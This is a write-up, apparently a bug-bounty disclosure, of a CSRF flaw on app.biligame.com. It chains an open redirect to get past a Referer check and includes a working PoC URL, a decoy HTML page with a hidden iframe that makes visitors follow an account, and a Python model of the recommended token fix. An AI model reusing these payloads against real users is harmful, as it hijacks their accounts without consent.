@1kbfree 2019-07-05T21:06:48.000000Z Word count 2064 Reads 3001

CSRF on app.biligame: following a user via a URL redirect

Vulnerability Discovery


Reproduction Steps

1. Open the URL: http://app.biligame.com/user_center?vmid=237211763


2. Click Follow, capture the request, convert it to a GET request and remove csrf_token. The result looks like this:

    GET /game/center/h5/user/relationship/modify_stat?fid=22297479&act=1&re_src=99&request_id=qnZfxMgqL8qF4sKlXDvBZxUp3tjiL21e&device_id=&build=&mid=&source_from=0&cur_host=app HTTP/1.1
    Host: line3-h5-mobile-api.biligame.com
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Referer: http://app.biligame.com/user_center?vmid=22297479
    Origin: http://app.biligame.com
    Cookie: [redacted]
    Connection: close


When I built a CSRF PoC from this request, I found that the endpoint actually validates the Referer, and the usual directory-name trick (putting the trusted host name into the path of the attacker's URL) did not get past it. I was about to give up when I came across a URL redirect vulnerability, which led to the attack steps below.

3. Open the URL redirect:

    http://my.biligame.com/smz/?orgUrl=http://www.baidu.com/

The orgUrl parameter is filtered here, but because the page we are attacking is itself under biligame (app.biligame), the redirect can still be used. This is what defeats the Referer check: the redirect page lives on my.biligame.com, so the request that finally reaches the API arrives with a biligame.com Referer rather than the attacker's. One caveat: that only holds when the hop is performed client-side by the redirect page (which the wait observed below points to); a plain HTTP 3xx redirect would carry the original referrer, i.e. the attacker's page, through to the API. The PoC is as follows:

    http://my.biligame.com/smz/?orgUrl=http%3A%2f%2fline3-h5-mobile-api.biligame.com%2fgame%2fcenter%2fh5%2fuser%2frelationship%2fmodify_stat%3Ffid%3D22297479%26act%3D1%26re_src%3D99%26request_id%3DqnZfxMgqL8qF4sKlXDvBZxUp3tjiL21e%26device_id%3D%26build%3D%26mid%3D%26source_from%3D0%26cur_host%3Dapp


The response here shows success, but the victim has to sit through the wait before the redirect fires, which is not good enough. Let's polish it a little (wrap it in an HTML page), as follows:

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <!-- Hide the iframe so the victim only sees the decoy text while the redirect runs -->
    <style>
    iframe {
      display: none;
    }
    </style>
    </head>
    <body>
    <h1>Drawing the prize, result in 5 seconds...</h1>
    <!-- The hidden iframe loads the biligame redirector, which sends the victim's
         browser (with its biligame cookies) on to the follow endpoint -->
    <iframe src="http://my.biligame.com/smz/?orgUrl=http%3A%2f%2fline3-h5-mobile-api.biligame.com%2fgame%2fcenter%2fh5%2fuser%2frelationship%2fmodify_stat%3Ffid%3D22297479%26act%3D1%26re_src%3D99%26request_id%3DqnZfxMgqL8qF4sKlXDvBZxUp3tjiL21e%26device_id%3D%26build%3D%26mid%3D%26source_from%3D0%26cur_host%3Dapp"></iframe>
    </body>
    </html>


The response shows success.

Vulnerability PoC

    http://my.biligame.com/smz/?orgUrl=http%3A%2f%2fline3-h5-mobile-api.biligame.com%2fgame%2fcenter%2fh5%2fuser%2frelationship%2fmodify_stat%3Ffid%3D22297479%26act%3D1%26re_src%3D99%26request_id%3DqnZfxMgqL8qF4sKlXDvBZxUp3tjiL21e%26device_id%3D%26build%3D%26mid%3D%26source_from%3D0%26cur_host%3Dapp

Fix

Strictly validate the CSRF token on every state-changing request, and do not rely on the Referer alone to stop CSRF: any open redirect on a trusted subdomain turns a Referer allowlist into a bypass.
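To make the Referer bypass and the recommended fix concrete, here is an added example (not biligame's code and not part of the original write-up). It models the follow endpoint's Referer-only check, shows how the same-site redirect hop from my.biligame.com satisfies it while an HTTP 302 hop would not, and puts a session-bound token check beside it. Host names and paths are taken from the write-up; the server-side logic, the session ids, the attacker origin and the HMAC token scheme are assumptions for illustration.

```python
"""Model of a Referer-only CSRF check versus a session-bound token check.

Hosts and paths mirror the write-up; the check logic, session ids, the
attacker origin and the token scheme are assumed for illustration and are
not biligame's implementation.
"""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, quote, urlencode, urlsplit

TRUSTED_SITE = "biligame.com"
API_HOST = "line3-h5-mobile-api.biligame.com"
FOLLOW_PATH = "/game/center/h5/user/relationship/modify_stat"
REDIRECTOR = "http://my.biligame.com/smz/"
ATTACKER_ORIGIN = "http://attacker.example"  # constructed attacker page origin


def build_poc_url(fid: int) -> str:
    """Nest the follow request (act=1) inside the redirector's orgUrl parameter.

    quote(..., safe="") percent-encodes ':', '/', '?', '&' and '=' so the inner
    query string is not split off by the outer URL's parser."""
    inner = f"http://{API_HOST}{FOLLOW_PATH}?" + urlencode(
        {"fid": fid, "act": 1, "re_src": 99, "cur_host": "app"})
    return f"{REDIRECTOR}?orgUrl={quote(inner, safe='')}"


def origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def api_request_after_redirect(poc_url: str, client_side: bool) -> dict:
    """Model the request the API receives once the browser follows the hop.

    client_side=True : the redirector page runs (e.g. a delayed JS/meta redirect),
                       so the referrer of the follow request is the redirector's
                       origin on biligame.com.
    client_side=False: an HTTP 3xx hop; browsers keep the original request's
                       referrer across redirects, so the attacker page's origin
                       reaches the API instead.
    The default referrer policy sends only the origin cross-site, so the header
    is modelled as an origin rather than a full URL."""
    inner = parse_qs(urlsplit(poc_url).query)["orgUrl"][0]
    referer = origin_of(poc_url) if client_side else ATTACKER_ORIGIN
    return {"url": inner,
            "query": parse_qs(urlsplit(inner).query),
            "headers": {"Referer": referer}}


def is_same_site(host) -> bool:
    return host is not None and (host == TRUSTED_SITE or host.endswith("." + TRUSTED_SITE))


def referer_only_check(request: dict) -> bool:
    """The weak check: accept any Referer under *.biligame.com."""
    referer = request["headers"].get("Referer")
    return referer is not None and is_same_site(urlsplit(referer).hostname)


# --- the fix: a per-session token the attacker can neither read nor forge ----
_SERVER_SECRET = secrets.token_bytes(32)  # assumed server-side secret


def issue_csrf_token(session_id: str) -> str:
    """Bind the token to the session so a token minted for one session is
    useless in another."""
    return hmac.new(_SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_check(request: dict, session_id: str) -> bool:
    """The strong check: a missing or wrong csrf_token rejects the request no
    matter what the Referer says."""
    supplied = request["query"].get("csrf_token", [None])[0]
    if supplied is None:
        return False
    return hmac.compare_digest(supplied, issue_csrf_token(session_id))


def with_token(request: dict, token: str) -> dict:
    """Return a copy of the request carrying csrf_token=token."""
    query = dict(request["query"])
    query["csrf_token"] = [token]
    return {**request, "query": query}


if __name__ == "__main__":
    poc = build_poc_url(22297479)
    via_js = api_request_after_redirect(poc, client_side=True)
    via_302 = api_request_after_redirect(poc, client_side=False)
    victim = "victim-session"
    print("Referer-only, client-side hop :", referer_only_check(via_js))
    print("Referer-only, HTTP 302 hop    :", referer_only_check(via_302))
    print("Token check, no token         :", token_check(via_js, victim))
    print("Token check, attacker's token :",
          token_check(with_token(via_js, issue_csrf_token("attacker-session")), victim))
    print("Token check, victim's token   :",
          token_check(with_token(via_js, issue_csrf_token(victim)), victim))
```

The first two lines of output are the whole story of this report: the Referer allowlist accepts the request that arrives through the client-side redirect on my.biligame.com and would reject it after a 302, while the token check rejects every forged request because the attacker's page can neither read the victim's token nor mint one without the server secret.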
